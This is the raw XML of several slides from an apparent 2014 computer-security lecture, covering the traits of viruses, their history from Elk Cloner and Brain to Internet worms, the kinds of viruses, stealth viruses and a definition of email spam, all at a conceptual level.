        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hard to detect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hard to destroy or deactivate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spreads infection widely/quickly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reinfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy to create</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Machine/OS independent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10429638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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325634" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Virus Evolution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Classical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>period</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Passive propagation through floppy disks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Slow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>propagation and hence need to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>efficient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>First known virus (Apple II): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Elk Cloner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> created in 1982 by Rich </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Skrenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>a 15-year-old high school </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>student</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It was a joke, simply showed a poem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>First PC virus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Brain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, spread in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>1986</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>isplayed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the address of the authors when computer booted, and replaced the disk label by @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>brain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919600940"/>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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331778" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Virus Evolution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331779" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modern period</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viruses/worms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet to actively </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>propagate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can infect the planet in a few </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hours</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Real threat as they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>propagate much faster than the anti-virus software can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>updated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38826383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Kind of Viruses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>iruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Historically important, but less common today </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory resident viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Standard infected executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Macro viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedded in documents (e.g. Word docs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Macros are programs in a scripting language (e.g. Visual Basic Script)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974437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Email spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically defined as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unsolicited automated email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sent in bulk to numerous recipients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The sender is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stranger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>recipient)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30994861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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327682" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stealth Viruses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simple: the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>compresses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the original file, and creates an infected file of the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Complex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the virus modifies the system so as to become </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>invisible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. modifies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>file reading routines so that they </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>don’t reveal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Brain (1986): infects the boot sector but keeps an original copy. It redirects all access to the boot sector towards the copy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69591856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smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Polymorphic Viruses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329731" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
